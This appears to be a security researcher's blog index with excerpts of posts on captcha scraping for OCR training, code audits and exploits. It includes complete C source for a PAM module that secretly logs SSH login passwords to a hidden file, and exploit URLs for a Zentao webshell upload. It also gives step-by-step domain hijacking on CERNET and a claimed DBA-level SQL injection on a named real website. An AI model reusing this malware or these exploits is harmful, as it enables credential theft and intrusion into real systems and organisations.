e4rl

Heavy internet addict / pseudo-programmer

Recognizing image captchas from the ThinkPHP captcha library think-captcha

Projects and servers used:
ThinkPHP: https://github.com/top-think/framework
think-captcha: https://github.com/top-think/think-captcha
captcha_trainer (training): https://github.com/kerlomz/captcha_trainer
captcha_platform (deployment): https://github.com/kerlomz/captcha_platform
MuggleOCR: https://pypi.org/project/muggle-ocr
captcha_trainer author's introduction: https://www.jianshu.com/p/80ef04b16efc
Matpool GPU server: https://matpool.com/

captcha_trainer workflow

Use ThinkPHP to call think-captcha and generate captchas:

```shell
composer create-project topthink/think tp
cd tp
composer require topthink/think-captcha
php think run
```

Modify the think-captcha source so the captcha text is stored in the session. Insert the following line at vendor/topthink/think-captcha/src/Captcha.php:195:

```php
Session::set('captcha', implode('', $code), '');
```

Print the captcha text from a controller:

```php
public function code()
{
    $code = Session::get('captcha', '');
    echo $code;
}
```

Use Python to grab captcha image samples, renaming and saving them according to captcha_trainer's default naming rule:

```python
import requests
import threading
import os
import hashlib


def md5(s, salt=''):
    # Hash the raw image bytes (plus an optional salt) to get a unique filename part
    data = s if isinstance(s, bytes) else str(s).encode()
    m = hashlib.md5(data + salt.encode())
    return m.hexdigest()


def get_captcha():
    session = requests.session()
    for i in range(0, 100000):
        try:
            # Fetch a fresh captcha image; the changing query string defeats caching
            content = session.get('http://x.com/captcha?' + str(i))
            if content.status_code != 200:
                continue
            # Read the captcha text back from the controller added above (same session)
            code = session.get('http://x.com/index/Home/code')
            if code.status_code != 200:
                continue
            # captcha_trainer default naming: <label>_<unique part>.png
            filename = '{}_{}.png'.format(code.text, md5(content.content))
            with open(os.path.join('captcha_images', filename), 'wb') as f:
                f.write(content.content)
        except Exception as e:
            print(str(e))


# The target directory must exist before the worker threads start writing
os.makedirs('captcha_images', exist_ok=True)
for i in range(1, 20):
    t = threading.Thread(target=get_captcha, args=())
    t.start()
```

Rent a Matpool RTX 2080 Ti GPU server for training ...

2020-12-23 · 8 min · 1584 words · e4rl

Zentao ≤12.4.2 getshell with backend administrator privileges

Vulnerability analysis

module/client/control.php:86 passes the parameter straight into module. Following downloadZipPackage, a global search finds two downloadZipPackage functions:

module/client/ext/model/xuanxuan.php:10 filters the link parameter: if the regex matches http[s]:// it returns false, which can be bypassed by using the FTP protocol.

module/client/model.php:240 base64-decodes the link parameter and then downloads the file into data/client/ joined with the directory given by the version parameter, with no filtering at all.

Call path: control -> ext module -> module

Exploitation

Exploit:
http://127.0.0.1/zentao/client-download-1-(base64 encode webshell download link)-1.html
http://127.0.0.1/zentao/data/client/1/(download link filename)

Reproduction: download the file over the FTP protocol, bypassing the HTTP protocol filter in the module/client/ext/model/xuanxuan.php:10 function.

2020-10-22 · 1 min · 39 words · e4rl

Code audit of the LOVE ME dating site source

Origin: https://www.t00ls.net/viewthread.php?tid=56414

Vulnerability analysis

Entry point Public/Inner/Js/uploader/server/php/index.php:

```php
<?php
error_reporting(E_ALL | E_STRICT);
require('UploadHandler.php');
$upload_handler = new UploadHandler();
```

Key code Public/Inner/Js/uploader/server/php/UploadHandler.php. Initialization:

```php
<?php
class UploadHandler
{
    protected $options;
    protected $error_messages = array(
        // omitted
    );
    protected $image_objects = array();

    function __construct($options = null, $initialize = true, $error_messages = null) {
        $this->options = array(
            'script_url' => $this->get_full_url().'/',
            'upload_dir' => dirname($this->get_server_var('SCRIPT_FILENAME')).'/files/',
            'upload_url' => $this->get_full_url().'/files/',
            'user_dirs' => false,
            'mkdir_mode' => 0755,
            'param_name' => 'files',
            'delete_type' => 'DELETE',
            'access_control_allow_origin' => '*',
            'access_control_allow_credentials' => false,
            'access_control_allow_methods' => array(
                'OPTIONS',
                'HEAD',
                'GET',
                'POST',
                'PUT',
                'PATCH',
                'DELETE'
            ),
            'access_control_allow_headers' => array(
                'Content-Type',
                'Content-Range',
                'Content-Disposition'
            ),
            'download_via_php' => false,
            'readfile_chunk_size' => 10 * 1024 * 1024, // 10 MiB
            'inline_file_types' => '/\.(gif|jpe?g|png)$/i',
            'accept_file_types' => '/.+$/i', // accepts any file extension
            'max_file_size' => null,
            'min_file_size' => 1,
            'max_number_of_files' => null,
            'image_file_types' => '/\.(gif|jpe?g|png)$/i',
            'correct_image_extensions' => false,
            'max_width' => null,
            'max_height' => null,
            'min_width' => 1,
            'min_height' => 1,
            'discard_aborted_uploads' => true,
            'image_library' => 1,
            'convert_bin' => 'convert',
            'identify_bin' => 'identify',
            'image_versions' => array(
                '' => array(
                    'auto_orient' => true
                ),
                'thumbnail' => array(
                    'max_width' => 80,
                    'max_height' => 80
                )
            )
        );
        if ($options) {
            $this->options = $options + $this->options; // initialize configuration
        }
        if ($error_messages) {
            $this->error_messages = $error_messages + $this->error_messages; // initialize error messages
        }
        if ($initialize) {
            $this->initialize(); // run the request handler
        }
    }

    protected function initialize() {
        // Dispatch on the HTTP request method
        switch ($this->get_server_var('REQUEST_METHOD')) {
            case 'OPTIONS':
            case 'HEAD':
                $this->head();
                break;
            case 'GET':
                $this->get();
                break;
            case 'PATCH':
            case 'PUT':
            case 'POST':
                $this->post();
                break;
            case 'DELETE':
                $this->delete();
                break;
            default:
                $this->header('HTTP/1.1 405 Method Not Allowed');
        }
    }
```

Following the post function: ...

2020-05-23 · 5 min · 1000 words · e4rl

Recording SSH login passwords with sshLooterC

Original project: https://github.com/mthbernardes/sshLooterC (pushes to Telegram)
Test environment: CentOS 7

Version that saves to a specified file, looter.c:

```c
#include <stdio.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <string.h>
#include <security/pam_appl.h>
#include <security/pam_modules.h>
#include <unistd.h>

/* curl write callback kept from the Telegram version; not used in this file-saving version */
size_t write_data(void *buffer, size_t size, size_t nmemb, void *userp)
{
    return size * nmemb;
}

/* Append the message to the log file */
void saveMessage(const char *message)
{
    FILE *fp = fopen("/tmp/.looter", "a+");
    if (fp == NULL) {
        return;
    }
    fputs(message, fp);
    fclose(fp);
}

PAM_EXTERN int pam_sm_setcred(pam_handle_t *pamh, int flags, int argc, const char **argv)
{
    return PAM_SUCCESS;
}

PAM_EXTERN int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv)
{
    return PAM_SUCCESS;
}

PAM_EXTERN int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv)
{
    int retval;
    const char *username;
    const char *password;
    char message[1024];

    retval = pam_get_user(pamh, &username, "Username: ");
    if (retval != PAM_SUCCESS) {
        return retval;
    }
    pam_get_item(pamh, PAM_AUTHTOK, (const void **) &password);
    /* Size must match the buffer: the original passed 2048 for a 1024-byte array */
    snprintf(message, sizeof(message), "Username %s\nPassword: %s\n", username, password);
    saveMessage(message);
    return PAM_SUCCESS;
}
```

1. Install dependency libraries ...

2020-03-20 · 2 min · 227 words · e4rl

Veno File Manager arbitrary file upload

Vulnerable code

/vfm-admin/chunk.php, line 134, key code:

```php
$chunk->createFileFromChunks(
    $_GET['loc'],
    $temp_dir,
    $resumableFilename,
    $_POST['resumableChunkSize'],
    $_POST['resumableTotalSize'],
    $_GET['logloc']
);
```

Following the createFileFromChunks function, /vfm-admin/class.php line 4383, key code:

```php
public function createFileFromChunks($location, $temp_dir, $fileName, $chunkSize, $totalSize, $logloc) {
    global $chunk;
    $upload_dir = str_replace('\\', '', $location);
    $extension = File::getFileExtension($fileName);
    // count all the parts of this file
    $total_files = 0;
    $finalfile = FileManager::safeExtension($fileName, $extension);
    // omitted
```

Following the safeExtension function, /vfm-admin/class.php line 1707, full code:

```php
public static function safeExtension($name, $extension) {
    $evil = array(
        'php','php3','php4','php5','htm','html','phtm','phtml',
        'shtm','shtml','asp','pl','py','jsp','sh','cgi','htaccess',
        'htpasswd','386','bat','cmd','pl','ddl','bin'
    ); // blacklist
    if (in_array($extension, $evil)) {
        $name = $name.'.txt'; // if the extension is on the blacklist, append .txt to the original filename
    }
    return $name;
}
```

http://blog.csdn.net/u011650048/article/details/51454014 ...

2017-10-07 · 1 min · 114 words · e4rl

How to hack the Central Academy of Drama? (A CERNET domain system vulnerability allows hijacking the domains of N schools, educational institutions and education departments nationwide)

1. Unauthorized domain management: http://domain.cernet.com/domainForm.do?domainId={domain ID}
2. Ownership transfer: (worked in earlier testing; the interface has since been closed and can no longer be tested)
3. Unauthorized modification of user profiles: (after changing the e-mail address, the password can be recovered)
3.1. Target user:
3.2. Create a new contact with another user:
3.3. Edit the contact and capture the request
3.4. Change username to the target user test111 and submit
3.5. Change the e-mail address and recover the password to obtain the target user's privileges:
3.5.1. Edit profile:
3.5.2. Recover password: an e-mail address not used by any user produces a prompt. Enter the e-mail address we just set: change the password to 123456
4. Bingo!~

2016-05-01 · 1 min · 15 words · e4rl

SQL injection vulnerability in the official website of JYP Entertainment's group Twice

I couldn't find a single damn admin backend on the main site or its neighbouring sites; Google and wordlists were all used up!
URL: h-t-t-p://twice.jype.com/notice.asp?idx=86
MSSQL 2008 / DBA
available databases [50]:

2016-01-16 · 1 min · 157 words · e4rl